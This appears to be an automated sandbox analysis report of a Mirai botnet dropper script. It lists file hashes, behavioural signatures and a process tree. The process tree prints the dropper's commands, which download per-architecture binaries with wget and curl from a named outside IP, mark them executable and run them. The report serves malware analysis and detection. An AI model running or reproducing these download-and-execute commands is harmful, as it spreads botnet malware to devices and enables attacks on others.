Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    08/03/2025, 08:41

General

  • Target

    6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh

  • Size

    1KB

  • MD5

    c46ce91068e77aa58bd2127bec2ee6c3

  • SHA1

    fced6e9a98cb1fd8b568f7698dbf1b4e1e4231d5

  • SHA256

    6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a

  • SHA512

    ace2a1517ff4dceb812a495e8f5d5a4bbec6825964ffca84b076f57610ed09232b3ad76e995fd83ba121d4a36f82acb0136f27da8d4fc272bd083ac1d8e3e7e9

Malware Config

Extracted

Family

mirai

Botnet

BOTNET

Extracted

Family

mirai

Botnet

BOTNET

Extracted

Family

mirai

Botnet

BOTNET

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • Contacts a large (157428) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 6 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Enumerates active TCP sockets 1 TTPs 1 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads process memory 1 TTPs 64 IoCs

    Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

  • Changes its process name 1 IoCs
  • Checks CPU configuration 1 TTPs 5 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 11 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh
    /tmp/6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh
    1⤵
    • Executes dropped EXE
    • Writes file to tmp directory
    PID:650
    • /usr/bin/wget
      wget http://176.65.134.5/jklx86
      2⤵
      • Writes file to tmp directory
      PID:653
    • /usr/bin/curl
      curl -O http://176.65.134.5/jklx86
      2⤵
      • Checks CPU configuration
      • Writes file to tmp directory
      PID:667
    • /bin/cat
      cat jklx86
      2⤵
        PID:677
      • /bin/chmod
        chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh jklx86 ssh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-m6Lurb
        2⤵
        • File and Directory Permissions Modification
        PID:679
      • /tmp/ssh
        ./ssh ssh
        2⤵
          PID:680
        • /usr/bin/wget
          wget http://176.65.134.5/jklmips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:683
        • /usr/bin/curl
          curl -O http://176.65.134.5/jklmips
          2⤵
          • Checks CPU configuration
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:687
        • /bin/cat
          cat jklmips
          2⤵
          • System Network Configuration Discovery
          PID:688
        • /bin/chmod
          chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh jklmips jklx86 ssh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-m6Lurb
          2⤵
          • File and Directory Permissions Modification
          PID:689
        • /tmp/ssh
          ./ssh ssh
          2⤵
            PID:690
          • /usr/bin/wget
            wget http://176.65.134.5/jklmpsl
            2⤵
            • Writes file to tmp directory
            PID:692
          • /usr/bin/curl
            curl -O http://176.65.134.5/jklmpsl
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            • Writes file to tmp directory
            PID:693
          • /bin/cat
            cat jklmpsl
            2⤵
              PID:698
            • /bin/chmod
              chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh jklmips jklmpsl jklx86 ssh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-m6Lurb
              2⤵
              • File and Directory Permissions Modification
              PID:699
            • /tmp/ssh
              ./ssh ssh
              2⤵
                PID:701
              • /usr/bin/wget
                wget http://176.65.134.5/jklarm4
                2⤵
                  PID:704
                • /usr/bin/curl
                  curl -O http://176.65.134.5/jklarm4
                  2⤵
                  • Checks CPU configuration
                  • Writes file to tmp directory
                  PID:707
                • /bin/cat
                  cat jklarm4
                  2⤵
                    PID:712
                  • /bin/chmod
                    chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh jklarm4 jklmips jklmpsl jklx86 ssh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-m6Lurb
                    2⤵
                    • File and Directory Permissions Modification
                    PID:713
                  • /tmp/ssh
                    ./ssh ssh
                    2⤵
                      PID:715
                    • /usr/bin/wget
                      wget http://176.65.134.5/jklarm5
                      2⤵
                      • Writes file to tmp directory
                      PID:716
                    • /usr/bin/curl
                      curl -O http://176.65.134.5/jklarm5
                      2⤵
                      • Checks CPU configuration
                      • Writes file to tmp directory
                      PID:724
                    • /bin/cat
                      cat jklarm5
                      2⤵
                        PID:736
                      • /bin/chmod
                        chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh jklarm4 jklarm5 jklmips jklmpsl jklx86 ssh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-m6Lurb
                        2⤵
                        • File and Directory Permissions Modification
                        PID:738
                      • /tmp/ssh
                        ./ssh ssh
                        2⤵
                        • Modifies Watchdog functionality
                        • Renames itself
                        • Enumerates active TCP sockets
                        • Reads process memory
                        • Changes its process name
                        • Reads system network configuration
                        • Reads runtime system information
                        PID:739
                      • /usr/bin/wget
                        wget http://176.65.134.5/jklarm6
                        2⤵
                        • Writes file to tmp directory
                        PID:741
                      • /usr/bin/curl
                        curl -O http://176.65.134.5/jklarm6
                        2⤵
                          PID:754
                        • /bin/cat
                          cat jklarm6
                          2⤵
                            PID:756
                          • /bin/chmod
                            chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh jklarm4 jklarm5 jklarm6 jklmips jklmpsl jklx86 ssh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-m6Lurb
                            2⤵
                            • File and Directory Permissions Modification
                            PID:757
                          • /tmp/ssh
                            ./ssh ssh
                            2⤵
                              PID:758
                            • /usr/bin/wget
                              wget http://176.65.134.5/jklarm7
                              2⤵
                                PID:759
                              • /usr/bin/curl
                                curl -O http://176.65.134.5/jklarm7
                                2⤵
                                  PID:761
                                • /bin/cat
                                  cat jklarm7
                                  2⤵
                                    PID:763
                                  • /bin/chmod
                                    chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh jklarm4 jklarm5 jklarm6 jklmips jklmpsl jklx86 ssh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-m6Lurb
                                    2⤵
                                    • File and Directory Permissions Modification
                                    PID:764
                                  • /tmp/ssh
                                    ./ssh ssh
                                    2⤵
                                      PID:766
                                    • /usr/bin/wget
                                      wget http://176.65.134.5/jklppc
                                      2⤵
                                        PID:768
                                      • /usr/bin/curl
                                        curl -O http://176.65.134.5/jklppc
                                        2⤵
                                          PID:769
                                        • /bin/cat
                                          cat jklppc
                                          2⤵
                                            PID:770
                                          • /bin/chmod
                                            chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh jklarm4 jklarm5 jklarm6 jklmips jklmpsl jklx86 ssh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-m6Lurb
                                            2⤵
                                            • File and Directory Permissions Modification
                                            PID:772
                                          • /tmp/ssh
                                            ./ssh ssh
                                            2⤵
                                              PID:773
                                            • /usr/bin/wget
                                              wget http://176.65.134.5/jklm68k
                                              2⤵
                                                PID:775
                                              • /usr/bin/curl
                                                curl -O http://176.65.134.5/jklm68k
                                                2⤵
                                                  PID:776
                                                • /bin/cat
                                                  cat jklm68k
                                                  2⤵
                                                    PID:777
                                                  • /bin/chmod
                                                    chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh jklarm4 jklarm5 jklarm6 jklmips jklmpsl jklx86 ssh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-m6Lurb
                                                    2⤵
                                                    • File and Directory Permissions Modification
                                                    PID:778
                                                  • /tmp/ssh
                                                    ./ssh ssh
                                                    2⤵
                                                      PID:779
                                                    • /usr/bin/wget
                                                      wget http://176.65.134.5/jklsh4
                                                      2⤵
                                                        PID:782
                                                      • /usr/bin/curl
                                                        curl -O http://176.65.134.5/jklsh4
                                                        2⤵
                                                          PID:783
                                                        • /bin/cat
                                                          cat jklsh4
                                                          2⤵
                                                            PID:784
                                                          • /bin/chmod
                                                            chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh jklarm4 jklarm5 jklarm6 jklmips jklmpsl jklx86 ssh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-m6Lurb
                                                            2⤵
                                                            • File and Directory Permissions Modification
                                                            PID:785
                                                          • /tmp/ssh
                                                            ./ssh ssh
                                                            2⤵
                                                              PID:787

                                                          Network

                                                          MITRE ATT&CK Enterprise v15

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads

                                                          • /tmp/jklarm4

                                                            Filesize

                                                            205B

                                                            MD5

                                                            fccd0deca96f1630531d355bdb90afae

                                                            SHA1

                                                            7b66856c4727953f5c23e898f574fd40bb3d3e33

                                                            SHA256

                                                            59be92959718afe8ed8ffe7009ae6530344385f67eb72791e8e37f52643cc27b

                                                            SHA512

                                                            cf80d05129a7c4a5ec44d167f1e6fe22a104238502456122d3aa72b711d92d008e016bd898ea23d79e28d8a1398b1a1d365db0b80d799cc74c46f9f169643b48

                                                          • /tmp/jklarm5

                                                            Filesize

                                                            55KB

                                                            MD5

                                                            13646cedba2b07cac40f1722c5ef9bb1

                                                            SHA1

                                                            32ed76ad7e47f7919f7c8909321645cdcfeabe8b

                                                            SHA256

                                                            e2f8212e25b5c981e0be92428f013b289c4e2af6198d8414ed91c343ee1987df

                                                            SHA512

                                                            ce7bc090d5266283748f16be2b434a85a43ed5dff513d762653afc365872a360611fbd0dbfbce0628794d26e3a1a7a0a319c5039b74f74db7996acf5a864ed87

                                                          • /tmp/jklarm6

                                                            Filesize

                                                            65KB

                                                            MD5

                                                            50bdc79e8119ec3deef4549fe78f959f

                                                            SHA1

                                                            b3898231d6b7d044566190bf2cbd04b1b20b7540

                                                            SHA256

                                                            cfee0df1ce4a388193fe3dd0dab48f4db9da05f67f7ccf0ba35fc8fcee38d397

                                                            SHA512

                                                            acb4a121ea03208cb12501aa332e4987841540a95703d7dac292fc766ed2b0b05e17343484c7c4a7d8c01d5952ea05b02964e72bf107f5fe0ffe51522f01875b

                                                          • /tmp/jklmips

                                                            Filesize

                                                            74KB

                                                            MD5

                                                            531a60e53317c7bf134e5c6e57fc4939

                                                            SHA1

                                                            6069b3cb94084ec8bfad12f20a7fc992835e329d

                                                            SHA256

                                                            9c8fa144a9688475d367bf19f455fa2efcede7219a41cf77484cabe788e17fe9

                                                            SHA512

                                                            f19ca0527fb858aff4da9f864f1fad8433cc229b8ffabec4fd559a3af4a3fe3d71213a913067a6fea4314b75881ebbe5a8d24408cd8199a3ed54b15725c7505e

                                                          • /tmp/jklmpsl

                                                            Filesize

                                                            74KB

                                                            MD5

                                                            d0667fe1aa667917ae32b2844024eba7

                                                            SHA1

                                                            6a4c65c673dd99d8c291aa343beb35f345c35def

                                                            SHA256

                                                            0d41d41efa67611f4721c465f81060f1d4c096eda88b72c0db43f104329afcb6

                                                            SHA512

                                                            9ff84ed51e53c77d228cd54fab728335c2d658006667c46db1da04c70e97444d47bf5ac6f87e4e4d812430bcca3c44e3ce186d1b604443b6de10bf5367699908

                                                          • /tmp/jklx86

                                                            Filesize

                                                            49KB

                                                            MD5

                                                            ecd1b914d0248a8174d1f5ef567e2227

                                                            SHA1

                                                            c5ba0731a7b3236db4b8443b6be4f2f07d5ed6e5

                                                            SHA256

                                                            adc70485dbae6ab79f9083ff5f96da2fece8b5922f0f5d0757d1c366285bfab6

                                                            SHA512

                                                            9e25c305fa81ce9c4f715d6bc746fae810bc255d7e3d10017242864c4c04923644e86fce42b16c0638a06eb44aa8abec2681d944670dd22d69ac4d0cebbe979f